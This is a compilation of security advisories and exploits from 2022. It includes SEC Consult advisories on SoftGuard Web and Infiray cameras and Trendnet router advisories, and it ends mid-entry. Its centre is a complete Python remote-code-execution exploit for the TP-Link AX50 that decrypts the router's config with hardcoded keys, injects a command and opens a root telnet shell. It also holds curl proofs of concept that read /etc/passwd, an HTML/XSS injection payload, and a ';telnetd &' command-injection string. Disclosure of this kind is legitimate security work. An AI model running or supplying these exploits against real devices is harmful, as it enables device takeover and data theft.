SoftGuard Web (SGW) versions prior to 5.1.5 suffer from html injection and arbitrary file system access allow for file downloads.

SEC Consult Vulnerability Lab Security Advisory < 20220609-0 >  
=======================================================================  
               title: Multiple vulnerabilities  
             product: SoftGuard SNMP Network Management Extension  
  vulnerable version: SoftGuard Web (SGW) < 5.1.5  
       fixed version: SoftGuard version 5.1.5 from 2022-06-01  
          CVE number: CVE-2022-31201, CVE-2022-31202  
              impact: High  
            homepage: https://gravitate.eu (reseller)  
               found: 2022-04-14  
                  by: Philipp Espernberger (Office Linz)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
There is no public description available for this vendor/product. The following  
description was provided as documentation:

"SoftGuard is a network management extension which collects inventory-, analysis-  
and debugging data of devices and networks at least once a day. SoftGuard has an  
open structure, is built simple, is easily expandable, easy to use and is laid out  
for large scale networks. The data collection is performed with the protocols SNMP  
supporting the versions 1, 2c and 3. Additional protocols like ssh, telnet, rsh,  
https, NetBIOS/IP, ICMP ... complemented by SNMP if required.

The SoftGuard Suite consists of three parts:

* SoftGuard Network Center (SNC)  
* SoftGuard Host Center (SHC)  
* SoftGuard Monitor Center (SMC)

Aditionally there are a bunch of common and customer specific expansions like  
SoftGuard Web (SGW), SoftGuard Statistic Tool (SST), Port Configuration Tool (PCT),  
Network Access Points (NAP), Technician Access Point (TAP), etc."

Business recommendation:  
------------------------  
SEC Consult recommends to update to the latest version of SoftGuard (network management  
extension).

An in-depth security analysis performed by security professionals is highly  
advised, to identify and resolve potential further critical security issues.

Vulnerability overview/description:  
-----------------------------------  
1) File System Access (CVE-2022-31202)  
The export function allows authenticated attackers to download any  
arbitrary local file from the file system due to insufficient input  
validation. The unfiltered URL parameter query enables an attacker to  
access arbitrary local files. This allows the attacker to define the  
complete path and the filename by himself. Files that include passwords  
and other sensitive information can be accessed.  
Furthermore, the built-in man functionality also allows attackers to  
read any arbitrary local file from the file system.

2) HTML Injection (CVE-2022-31201)  
Various components do not properly sanitize/encode user input. This  
leads to HTML injection vulnerabilities. By exploiting this vulnerability,  
an attacker can include arbitrary HTML into the affected web page. The  
code is executed in the context of the victim's browser when visiting  
the manipulated URL. The vulnerability can be used to change the contents  
of the displayed site or redirect to other sites.

During the security assessment it was not possible to execute JavaScript  
code because the security headers Content-Security-Policy and  
X-Content-Type-Options are preventing the execution.

Proof of concept:  
-----------------  
1) File System Access (CVE-2022-31202)  
1a) Export functionality  
In order to access arbitrary local files, the export function as authenticated  
user (Administration -> User -> Access -> Export) can be used. The following URL  
was used to set the filename to /etc/passwd  
===============================================================================  
https://$host:8016/sgw/export?dbs=file&db=DefUser_access_$username_db%2e  
1649426888398872%2etmp&query=file%3a/etc/passwd'

===============================================================================

The newly set filename (/etc/passwd) can be exported and downloaded via the  
execution button. Afterwards the content of the file gets downloaded successfully.  
===============================================================================  
root:x:0:0:root:/root:/bin/bash  
bin:x:1:1:bin:/bin:/sbin/nologin  
daemon:x:2:2:daemon:/sbin:/sbin/nologin  
adm:x:3:4:adm:/var/adm:/sbin/nologin  
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin  
sync:x:5:0:sync:/sbin:/bin/sync  
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin  
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin  
nobody:x:99:99:Nobody:/:/sbin/nologin  
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin  
dbus:x:81:81:System message bus:/:/sbin/nologin  
[...]  
===============================================================================

1b) MAN functionality  
The following curl command shows how an authenticated attacker can gain access  
to any arbitrary local file:  
===============================================================================  
curl 'https://$host:8016/cgi-bin/man.tcl' -H 'Authorization: Basic [...]'  
--data 'act=1&x=%2Fetc%2Fpasswd&submit=Execute' --compressed --insecure

===============================================================================

The curl response includes the contents of the file:  
===============================================================================  
<!DOCTYPE html>  
<html lang="en"><head><meta charset="UTF-8" />  
[...]  
<pre>  
root:x:0:0:root:/root:/bin/bash  
bin:x:1:1:bin:/bin:/sbin/nologin  
daemon:x:2:2:daemon:/sbin:/sbin/nologin  
adm:x:3:4:adm:/var/adm:/sbin/nologin  
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin  
sync:x:5:0:sync:/sbin:/bin/sync  
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin  
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin  
nobody:x:99:99:Nobody:/:/sbin/nologin  
systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin  
dbus:x:81:81:System message bus:/:/sbin/nologin  
[...]  
===============================================================================

2) HTML Injection (CVE-2022-31201)  
When a new graph is created an authenticated attacker controls the GET parameters  
and can inject malicious content. The following curl command shows how an  
authenticated attacker can inject HTML code:  
===============================================================================  
curl 'https://$host:8016/sgw/graph?tbl=sgNode&t=percent&h=Status%3Ch1%3ESEC-  
Consult%3C/h1%3E+%23&v=%7bdown+1934+orange%7d+%7bicmp+555+red%7d+%7bsnmpaaaa+8723+green%7d&scale=5'  
-H 'Authorization: Basic [...]' --compressed --insecure

===============================================================================

The curl response includes the injected HTML code <h1>SEC Consult</h1>:  
===============================================================================  
<!DOCTYPE html>  
<html lang="en">  
<head>  
  <meta charset="UTF-8"/>  
  <title>SGW - Graph: Node</title>  
[...]  
</head>  
<body class="master">  
  [...]  
  <caption>∑3, Status<h1>SEC Consult</h1>, #11212</caption>  
  [...]  
  <tr><td>Status<h1>SEC Consult</h1></td>  
[...]  
</body></html>  
===============================================================================

Vulnerable / tested versions:  
-----------------------------  
The following version has been tested and found to be vulnerable:  
* SoftGuard Web (SGW) 5.1.3

The vendor provided the following information regarding the affected versions:

1a) affected version 4.5.0 (2019-05-04) to version 4.5.8 (2020-05-05)  
1b) since SoftGuard 2.0 with SoftGuard Web 1.0 (~1998/99)  
2)  since SoftGuard 3.6.0 (2009-10-31) / SoftGuard 3.6.6 (2011-02-15) with  
     SoftGuard Web 2.6.0/2.6.6

Vendor contact timeline:  
------------------------  
2022-05-11: Contacting vendor through direct email address.  
2022-05-11: Sent encrypted security advisory to vendor  
2022-05-12: Received feedback from the vendor for the security advisory  
2022-05-16: Received confirmation that a new version of SoftGuard was  
             already rolled out to the customers which included the fix  
2022-05-16: Received additional information which versions are vulnerable  
2022-05-19: Received CVE numbers.  
2022-05-20: Reviewed the fixed version 5.1.4 and found that HTML injection  
             still works at other endpoints, other issues are fixed.  
2022-05-20: Vendor replies that new version 5.1.5. will be released on 1st June.  
2022-06-01: Vendor releases patched version 5.1.5.  
2022-06-09: Coordinated release of security advisory.

Solution:  
---------  
The vendor rolled out new software versions. Affected users should verify that  
they are using the latest version available (5.1.5 from 2022-06-01 or higher).

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF P. Espernberger / @2022

SoftGuard SNMP Network Management Extension HTML Injection / File Download

TP-Link AX50 router with firmware 210730 suffers from an authenticated remote code execution vulnerability.

    # Exploit Title: TP-Link Router AX50 firmware 210730 - Remote Code Execution (RCE) (Authenticated)# Exploit Author: Tomas Melicher# Technical Details: https://github.com/aaronsvk/CVE-2022-30075# Date: 2022-06-08# Vendor Homepage: https://www.tp-link.com/# Tested On: Tp-Link Archer AX50# Vulnerability Description: Remote Code Execution via importing malicious config file# CVE: CVE-2022-30075#!/usr/bin/python3import argparse # pip install argparseimport requests # pip install requestsimport binascii, base64, os, re, json, sys, time, math, random, hashlibimport tarfile, zlibfrom Crypto.Cipher import AES, PKCS1_v1_5, PKCS1_OAEP # pip install pycryptodomefrom Crypto.PublicKey import RSAfrom Crypto.Util.Padding import pad, unpadfrom Crypto.Random import get_random_bytesfrom urllib.parse import urlencodeclass WebClient(object):  def __init__(self, target, password):    self.target = target    self.password = password.encode('utf-8')    self.password_hash = hashlib.md5(('admin%s'%password).encode('utf-8')).hexdigest().encode('utf-8')    self.aes_key = (str(time.time()) + str(random.random())).replace('.','')[0:AES.block_size].encode('utf-8')    self.aes_iv = (str(time.time()) + str(random.random())).replace('.','')[0:AES.block_size].encode('utf-8')    self.stok = ''    self.session = requests.Session()    data = self.basic_request('/login?form=auth', {'operation':'read'})    if data['success'] != True:      print('[!] unsupported router')      return    self.sign_rsa_n = int(data['data']['key'][0], 16)    self.sign_rsa_e = int(data['data']['key'][1], 16)    self.seq = data['data']['seq']    data = self.basic_request('/login?form=keys', {'operation':'read'})    self.password_rsa_n = int(data['data']['password'][0], 16)    self.password_rsa_e = int(data['data']['password'][1], 16)    self.stok = self.login()  def aes_encrypt(self, aes_key, aes_iv, aes_block_size, plaintext):    cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv)    plaintext_padded = pad(plaintext, aes_block_size)    return cipher.encrypt(plaintext_padded)  def aes_decrypt(self, aes_key, aes_iv, aes_block_size, ciphertext):    cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv)    plaintext_padded = cipher.decrypt(ciphertext)    plaintext = unpad(plaintext_padded, aes_block_size)    return plaintext  def rsa_encrypt(self, n, e, plaintext):    public_key = RSA.construct((n, e)).publickey()    encryptor = PKCS1_v1_5.new(public_key)    block_size = int(public_key.n.bit_length()/8) - 11    encrypted_text = ''    for i in range(0, len(plaintext), block_size):      encrypted_text += encryptor.encrypt(plaintext[i:i+block_size]).hex()    return encrypted_text  def download_request(self, url, post_data):    res = self.session.post('http://%s/cgi-bin/luci/;stok=%s%s'%(self.target,self.stok,url), data=post_data, stream=True)    filepath = os.getcwd()+'/'+re.findall(r'(?<=filename=")[^"]+', res.headers['Content-Disposition'])[0]    if os.path.exists(filepath):      print('[!] can\'t download, file "%s" already exists' % filepath)      return    with open(filepath, 'wb') as f:      for chunk in res.iter_content(chunk_size=4096):        f.write(chunk)    return filepath  def basic_request(self, url, post_data, files_data={}):    res = self.session.post('http://%s/cgi-bin/luci/;stok=%s%s'%(self.target,self.stok,url), data=post_data, files=files_data)    return json.loads(res.content)  def encrypted_request(self, url, post_data):    serialized_data = urlencode(post_data)    encrypted_data = self.aes_encrypt(self.aes_key, self.aes_iv, AES.block_size, serialized_data.encode('utf-8'))    encrypted_data = base64.b64encode(encrypted_data)    signature = ('k=%s&i=%s&h=%s&s=%d'.encode('utf-8')) % (self.aes_key, self.aes_iv, self.password_hash, self.seq+len(encrypted_data))    encrypted_signature = self.rsa_encrypt(self.sign_rsa_n, self.sign_rsa_e, signature)    res = self.session.post('http://%s/cgi-bin/luci/;stok=%s%s'%(self.target,self.stok,url), data={'sign':encrypted_signature, 'data':encrypted_data}) # order of params is important    if(res.status_code != 200):      print('[!] url "%s" returned unexpected status code'%(url))      return    encrypted_data = json.loads(res.content)    encrypted_data = base64.b64decode(encrypted_data['data'])    data = self.aes_decrypt(self.aes_key, self.aes_iv, AES.block_size, encrypted_data)    return json.loads(data)  def login(self):    post_data = {'operation':'login', 'password':self.rsa_encrypt(self.password_rsa_n, self.password_rsa_e, self.password)}    data = self.encrypted_request('/login?form=login', post_data)    if data['success'] != True:      print('[!] login failed')      return    print('[+] logged in, received token (stok): %s'%(data['data']['stok']))    return data['data']['stok']class BackupParser(object):  def __init__(self, filepath):    self.encrypted_path = os.path.abspath(filepath)    self.decrypted_path = os.path.splitext(filepath)[0]    self.aes_key = bytes.fromhex('2EB38F7EC41D4B8E1422805BCD5F740BC3B95BE163E39D67579EB344427F7836') # strings ./squashfs-root/usr/lib/lua/luci/model/crypto.lua    self.iv = bytes.fromhex('360028C9064242F81074F4C127D299F6') # strings ./squashfs-root/usr/lib/lua/luci/model/crypto.lua  def aes_encrypt(self, aes_key, aes_iv, aes_block_size, plaintext):    cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv)    plaintext_padded = pad(plaintext, aes_block_size)    return cipher.encrypt(plaintext_padded)  def aes_decrypt(self, aes_key, aes_iv, aes_block_size, ciphertext):    cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv)    plaintext_padded = cipher.decrypt(ciphertext)    plaintext = unpad(plaintext_padded, aes_block_size)    return plaintext  def encrypt_config(self):    if not os.path.isdir(self.decrypted_path):      print('[!] invalid directory "%s"'%(self.decrypted_path))      return    # encrypt, compress each .xml using zlib and add them to tar archive    with tarfile.open('%s/data.tar'%(self.decrypted_path), 'w') as tar:      for filename in os.listdir(self.decrypted_path):        basename,ext = os.path.splitext(filename)        if ext == '.xml':          xml_path = '%s/%s'%(self.decrypted_path,filename)          bin_path = '%s/%s.bin'%(self.decrypted_path,basename)          with open(xml_path, 'rb') as f:            plaintext = f.read()          if len(plaintext) == 0:            f = open(bin_path, 'w')            f.close()          else:            compressed = zlib.compress(plaintext)            encrypted = self.aes_encrypt(self.aes_key, self.iv, AES.block_size, compressed)            with open(bin_path, 'wb') as f:              f.write(encrypted)          tar.add(bin_path, os.path.basename(bin_path))          os.unlink(bin_path)    # compress tar archive using zlib and encrypt    with open('%s/md5_sum'%(self.decrypted_path), 'rb') as f1, open('%s/data.tar'%(self.decrypted_path), 'rb') as f2:      compressed = zlib.compress(f1.read()+f2.read())    encrypted = self.aes_encrypt(self.aes_key, self.iv, AES.block_size, compressed)    # write into final config file    with open('%s'%(self.encrypted_path), 'wb') as f:      f.write(encrypted)    os.unlink('%s/data.tar'%(self.decrypted_path))  def decrypt_config(self):    if not os.path.isfile(self.encrypted_path):      print('[!] invalid file "%s"'%(self.encrypted_path))      return    # decrypt and decompress config file    with open(self.encrypted_path, 'rb') as f:      decrypted = self.aes_decrypt(self.aes_key, self.iv, AES.block_size, f.read())    decompressed = zlib.decompress(decrypted)    os.mkdir(self.decrypted_path)    # store decrypted data into files    with open('%s/md5_sum'%(self.decrypted_path), 'wb') as f:      f.write(decompressed[0:16])    with open('%s/data.tar'%(self.decrypted_path), 'wb') as f:      f.write(decompressed[16:])    # untar second part of decrypted data    with tarfile.open('%s/data.tar'%(self.decrypted_path), 'r') as tar:      tar.extractall(path=self.decrypted_path)    # decrypt and decompress each .bin file from tar archive    for filename in os.listdir(self.decrypted_path):      basename,ext = os.path.splitext(filename)      if ext == '.bin':        bin_path = '%s/%s'%(self.decrypted_path,filename)        xml_path = '%s/%s.xml'%(self.decrypted_path,basename)        with open(bin_path, 'rb') as f:          ciphertext = f.read()        os.unlink(bin_path)        if len(ciphertext) == 0:          f = open(xml_path, 'w')          f.close()          continue        decrypted = self.aes_decrypt(self.aes_key, self.iv, AES.block_size, ciphertext)        decompressed = zlib.decompress(decrypted)        with open(xml_path, 'wb') as f:          f.write(decompressed)    os.unlink('%s/data.tar'%(self.decrypted_path))  def modify_config(self, command):    xml_path = '%s/ori-backup-user-config.xml'%(self.decrypted_path)    if not os.path.isfile(xml_path):      print('[!] invalid file "%s"'%(xml_path))      return    with open(xml_path, 'r') as f:      xml_content = f.read()    # https://openwrt.org/docs/guide-user/services/ddns/client#detecting_wan_ip_with_script    payload = '<service name="exploit">\n'    payload += '<enabled>on</enabled>\n'    payload += '<update_url>http://127.0.0.1/</update_url>\n'    payload += '<domain>x.example.org</domain>\n'    payload += '<username>X</username>\n'    payload += '<password>X</password>\n'    payload += '<ip_source>script</ip_source>\n'    payload += '<ip_script>%s</ip_script>\n' % (command.replace('<','<').replace('&','&'))    payload += '<interface>internet</interface>\n' # not worked for other interfaces    payload += '<retry_interval>5</retry_interval>\n'    payload += '<retry_unit>seconds</retry_unit>\n'    payload += '<retry_times>3</retry_times>\n'    payload += '<check_interval>12</check_interval>\n'    payload += '<check_unit>hours</check_unit>\n'    payload += '<force_interval>30</force_interval>\n'    payload += '<force_unit>days</force_unit>\n'    payload += '</service>\n'    if '<service name="exploit">' in xml_content:      xml_content = re.sub(r'<service name="exploit">[\s\S]+?</service>\n</ddns>', '%s</ddns>'%(payload), xml_content, 1)    else:      xml_content = xml_content.replace('</service>\n</ddns>', '</service>\n%s</ddns>'%(payload), 1)    with open(xml_path, 'w') as f:      f.write(xml_content)arg_parser = argparse.ArgumentParser()arg_parser.add_argument('-t', metavar='target', help='ip address of tp-link router', required=True)arg_parser.add_argument('-p', metavar='password', required=True)arg_parser.add_argument('-b', action='store_true', help='only backup and decrypt config')arg_parser.add_argument('-r', metavar='backup_directory', help='only encrypt and restore directory with decrypted config')arg_parser.add_argument('-c', metavar='cmd', default='/usr/sbin/telnetd -l /bin/login.sh', help='command to execute')args = arg_parser.parse_args()client = WebClient(args.t, args.p)parser = Noneif not args.r:  print('[*] downloading config file ...')  filepath = client.download_request('/admin/firmware?form=config_multipart', {'operation':'backup'})  if not filepath:    sys.exit(-1)  print('[*] decrypting config file "%s" ...'%(filepath))  parser = BackupParser(filepath)  parser.decrypt_config()  print('[+] successfully decrypted into directory "%s"'%(parser.decrypted_path))if not args.b and not args.r:  filepath = '%s_modified'%(parser.decrypted_path)  os.rename(parser.decrypted_path, filepath)  parser.decrypted_path = os.path.abspath(filepath)  parser.encrypted_path = '%s.bin'%(filepath)  parser.modify_config(args.c)  print('[+] modified directory with decrypted config "%s" ...'%(parser.decrypted_path))if not args.b:  if parser is None:    parser = BackupParser('%s.bin'%(args.r.rstrip('/')))  print('[*] encrypting directory with modified config "%s" ...'%(parser.decrypted_path))  parser.encrypt_config()  data = client.basic_request('/admin/firmware?form=config_multipart', {'operation':'read'})  timeout = data['data']['totaltime'] if data['success'] else 180  print('[*] uploading modified config file "%s"'%(parser.encrypted_path))  data = client.basic_request('/admin/firmware?form=config_multipart', {'operation':'restore'}, {'archive':open(parser.encrypted_path,'rb')})  if not data['success']:    print('[!] unexpected response')    print(data)    sys.exit(-1)  print('[+] config file successfully uploaded')  print('[*] router will reboot in few seconds... when it becomes online again (few minutes), try "telnet %s" and enjoy root shell !!!'%(args.t))

TP-Link AX50 Remote Code Execution

Infiray IRAY-A8Z3 thermal camera version 1.0.957 suffers from hardcoded web credential, authenticated remote code execution, buffer overflow, lack of password for root, and outdated software component vulnerabilities.

SEC Consult Vulnerability Lab Security Advisory < 20220607-0 >  
=======================================================================  
               title: Multiple Vulnerabilities  
             product: Infiray IRAY-A8Z3 thermal camera  
  vulnerable version: V1.0.957  
       fixed version: None  
          CVE number: CVE-2022-31208, CVE-2022-31209, CVE-2022-31210,  
                      CVE-2022-31211  
              impact: Critical  
            homepage: http://www.infiray.com/  
               found: 2021-02  
                  by: S. Robertz (Office Vienna)  
                      F. Lienhart  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Atos company  
                      Europe | Asia | North America

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"IRay Technology Co., Ltd. is a wholly-owned subsidiary of Raytron Technology  
Co., Ltd. (SSE: 688002). As a high-tech enterprise, IRay Technology develops  
and manufactures infrared FPA detectors, thermal imaging modules, and other  
products, with completely independent intellectual property rights. We are  
committed to providing global customers with professional thermal imaging  
products and solutions. The main products include IRFPA detectors, thermal  
imaging cores, and terminal products for application."

Source: http://www.infiray.com/about.html

Business recommendation:  
------------------------  
The vendor was unresponsive during the disclosure process. Hence it is unclear  
whether patches are available. Customers are urged to approach their vendor  
contact and request security reviews and updates.

SEC Consult recommends to perform a thorough security review of these  
products conducted by security professionals to identify and resolve all  
security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Hardcoded Web Credentials (CVE-2022-31210)  
The binary file "/usr/local/sbin/webproject/set_param.cgi" contains hardcoded  
credentials to the web application. As these accounts cannot be deactivated  
or change their passwords, they are considered to be backdoor accounts.

2) Authenticated Remote Code Execution (CVE-2022-31208)  
The webserver contains an endpoint that can execute arbitrary commands by  
manipulating the "cmd_string" URL parameter. The user can login using one  
of the backdoor accounts from issue 1.

3) Potential Buffer Overflow (CVE-2022-31209)  
The firmware contains a potential buffer overflow by calling strcpy() without  
checking the string length beforehand.

4) Telnet Root Shell without Password (CVE-2022-31211)  
The camera offers a shell through a telnet connection. The root user does not  
require a password per default. Thus, anyone on the local network can  
execute arbitrary commands as root on the camera.

5) Multiple Outdated Software Components  
Multiple outdated software components containing vulnerabilities were found by  
the IoT Inspector (ONEKEY) firmware analysis platform.

Proof of concept:  
-----------------  
1) Hardcoded Web Credentials (CVE-2022-31210)  
The following cgi program will be executed during the login process:

http://<my_ip>:8080/set_param.cgi?&group_tag=hash_param_bridge  
&set_cmd=loading&length=35&name=<user>&password=<password>&access=0  
&0.3543773172371312

The following de-compilation shows the code flow with the hardcoded passwords:  
-------------------------------------------------------------------------------  
[ PoC removed ]  
-------------------------------------------------------------------------------  
The authentication works by comparing the URL supplied username with the string  
"[removed]". Afterwards it will compare the password parameter to "[removed]" as well. If both  
string parameters match, a message will be removed from the messaging queue.  
Otherwise the function will just return. The same comparison holds for the admin account.

Furthermore, string comparisons are made without checking the case. Hence,  
drastically improving the chances of brute-force attacks.

2) Authenticated Remote Code Execution (CVE-2022-31208)  
The web application offers an option to view the device log. Opening following URL while  
logged in as admin (e.g. with hardcoded password from section 1) will trigger the request:

http://<my_ip>:8080/cmd.cgi?cmd_tag=cmd_passthrough&cmd_string=[removed]

By changing the "cmd_string" parameter, arbitrary commands can be executed with  
the rights of the webserver (www-data). The de-compiled code can be seen in following  
snippet:  
-------------------------------------------------------------------------------  
[ PoC removed ]  
-------------------------------------------------------------------------------  
The "cmd_string" parameter is directly passed into popen() and hence executed.

3) Potential Buffer-Overflow (CVE-2022-31209)  
The firmware contains a potential buffer overflow vulnerability:  
-------------------------------------------------------------------------------  
[ PoC removed ]  
-------------------------------------------------------------------------------  
A pointer to the "next_url" parameter is supplied. A buffer of 64 bytes is  
allocated and the parameter value copied to it without checking the string  
length. Hence, a "next_url" parameter with more than 64 bytes could be  
supplied in order to overflow the buffer.  
Please note that this vulnerability is only based on firmware analysis and thus  
was not tested in a live scenario.

4) Telnet Root Shell without Password (CVE-2022-31211)  
The camera has a telnetd server running on port 23 per default. The root  
password is empty. If the telnet port is exposed to the internet, an attacker  
could easily connect to the device and gain root access. The telnet server  
cannot be deactivated and the root password cannot be changed through the  
web interface.

5) Multiple Outdated Software Components  
IoT Inspector (ONEKEY) recognized multiple outdated software components  
with known vulnerabilities:

BusyBox 1.25.0:                                  6 CVEs  
curl 7.54.0:                                    13 CVEs  
Dnsmasq 2.76:                                    9 CVEs  
lighttpd 1.4.41:                                 2 CVEs  
Linux Kernel 3.10.104:                        1004 CVEs  
hostapd 2.5:                                    22 CVEs  
wpa_supplicant 2.5-devel_rtw_r17190.20160415:   12 CVEs

Vulnerable / tested versions:  
-----------------------------  
The following product/firmware version has been tested:  
* Infiray IRAY-A8Z3 V1.0.957

It has to be assumed that further products or firmware versions are affected as well.

Vendor contact timeline:  
------------------------  
2021-02-24: Contacting vendor through email address found on their website  
             (sales@infiray.com)  
2021-03-11: Contacted vendor again through sales@infiray.com  
2021-04-12: Contacting vendor through sales@infiray.com and InfiRay.CS@iraytek.com  
2021-04-12: Response from Sales Director, does not understand what to do with the information  
2021-04-12: Requesting a contact to the product owner or developer  
2021-04-13: Sending unencrypted security advisory to two provided email addresses.  
2021-04-29: Requesting status from vendor, no reply.  
2022-04-05: Requested status from vendor, no reply.  
2022-06-07: Release of security advisory.

Solution:  
---------  
The vendor was unresponsive during the disclosure process. Hence it is unclear  
whether patches are available. Customers are urged to approach their vendor  
contact and request security reviews and updates.

Workaround:  
-----------  
None

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult, an Atos company  
Europe | Asia | North America

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Atos company. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: http://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF S. Robertz, F. Lienhart / @2022

Infiray IRAY-A8Z3 1.0.957 Code Execution / Overflow / Hardcoded Credentials

Zyxel firewalls, AP controllers, and APs suffer from buffer overflow, format string, and command injection vulnerabilities.

Zyxel Buffer Overflow / Format String / Command Injection

An issue was found on TRENDnet TEW-831DR 1.0 601.130.1.1356 devices. An OS injection vulnerability exists within the web interface, allowing an attacker with valid credentials to execute arbitrary shell commands.

The Trendnet TEW-831DR WiFi Router was found to have multiple vulnerabilities exposing the owners of the router to potential intrusion of their local WiFi network and possible takeover of the device.

Five vulnerabilities were discovered. Below are links to the associated technical advisories:

*   Technical Advisory: Stored XSS in Web Interface for Trendnet TEW-831DR WiFi router (CVE-2022-30326)
*   Technical Advisory: Lack of Current Password Verification for Password/Username Change Feature (CVE-2022-30328)
*   Technical Advisory: OS Command Injection in Trendnet TEW-831DR WiFi router (CVE-2022-30329)
*   Technical Advisory: CSRF Vulnerability for Trendnet TEW-831DR WiFi router (CVE-2022-30327)
*   Technical Advisory: Weak Default Pre-Shared Key for Trendnet TEW-831DR WiFi Router (CVE-2022-30325)

Technical Advisories:

**Stored XSS in Web Interface for Trendnet TEW-831DR WiFi router (CVE-2022-30326)**

Vendor: Trendnet  
Vendor URL: https://www.trendnet.com/  
Versions affected: All Versions  
System Affected: TEW-831DR  
CVE Identifier: CVE-2022-30326  
Severity: Medium 5.0

**Summary**

Trendnet TEW-831DR is a WiFi router with a web interface for configuration. It was found that the network pre-shared key field on the web interface is vulnerable to XSS.

**Impact**

An attacker can use a simple XSS payload to crash the main page of the router web interface.

**Details**

Stored XSS is a vulnerability related to improper validation of user input and output. In stored XSS the web interface accepts input from the user and stores it for later without proper encoding. A web application that is vulnerable to XSS allows an attacker to send a malicious script to the user.

The example below will crash the basic\_conf page and create a popup on the 5G home.htm page:

    <input type="text" name="pskValue0" id="pskValue0" size="30" maxlength="64" value="<script>alert(1)</script>">

**Recommendation**

This issue was fixed on the newest version of the firmware published by Trendnet, v1.0(601.130.1.1410). Owners of the vulnerable devices should update to the latest firmware through the web interface of the router to prevent exploitation of this bug.

**Lack of Current Password Verification for Password/Username Change Feature (CVE-2022-30328)**

Vendor: Trendnet  
Vendor URL: https://www.trendnet.com/  
Versions affected: All Versions  
System Affected: TEW-831DR  
CVE Identifier: CVE-2022-30328  
Severity: Medium 4.0

**Summary**

Trendnet TEW-831DR is a WiFi router with a web interface for configuration. It was found that the router web interface has an insecure username and password setup.

**Impact**

A malicious user can change the username and password of the interface.

**Details**

The username and password setup for the router web interface does not require entering the existing password. An attacker can use CSRF to trick the user to send a request to the web interface to change the username and password of the router.

**Recommendation**

Trendnet indicated that this CVE will not be fixed at this point. Router owners should logout of the device web interface after use.

**OS Command Injection in Trendnet TEW-831DR WiFi router (CVE-2022-30329)**

Vendor: Trendnet  
Vendor URL: https://www.trendnet.com/  
Versions affected: All Versions  
System Affected: TEW-831DR  
CVE Identifier: CVE-2022-30329  
Severity: Medium 6.3

**Summary**

Trendnet TEW-831DR is a WiFi router with a web interface for configuration. It was found that commands could be injected into the diagnostics field within the web interface.

**Impact**

An OS injection vulnerability was found within the web interface of the device allowing an attacker with valid credentials to execute arbitrary shell commands.

**Details**

The web interface has a diagnostics page that uses ping/traceroute. In the host(domain) an attacker can enter an IP with a ; at the end and inject a command to be executed by the device. Using command injection telnetd can be enabled. Telnetd is a remote terminal protocol server.

For example, the following can be entered into the host(domain) to enable telnetd:

    192.168.10.02;telnetd &

After running the command, any telnet client can be used to login to the root account from the local area network (LAN):

    user: root
    Password: the admin password 

Running the ls command will list the files in the current directory:

    bin   etc   init  mnt   root  tmp   var
    dev   home  lib   proc  sys   usr   web

**Recommendation**

This issue was fixed on the newest version of the firmware published by Trendnet, v1.0(601.130.1.1410). Owners of the vulnerable devices should update to the latest firmware through the web interface of the router to prevent exploitation of this bug.

**CSRF Vulnerability for Trendnet TEW-831DR WiFi router (CVE-2022-30327)**

Vendor: Trendnet  
Vendor URL: https://www.trendnet.com/  
Versions affected: All Versions  
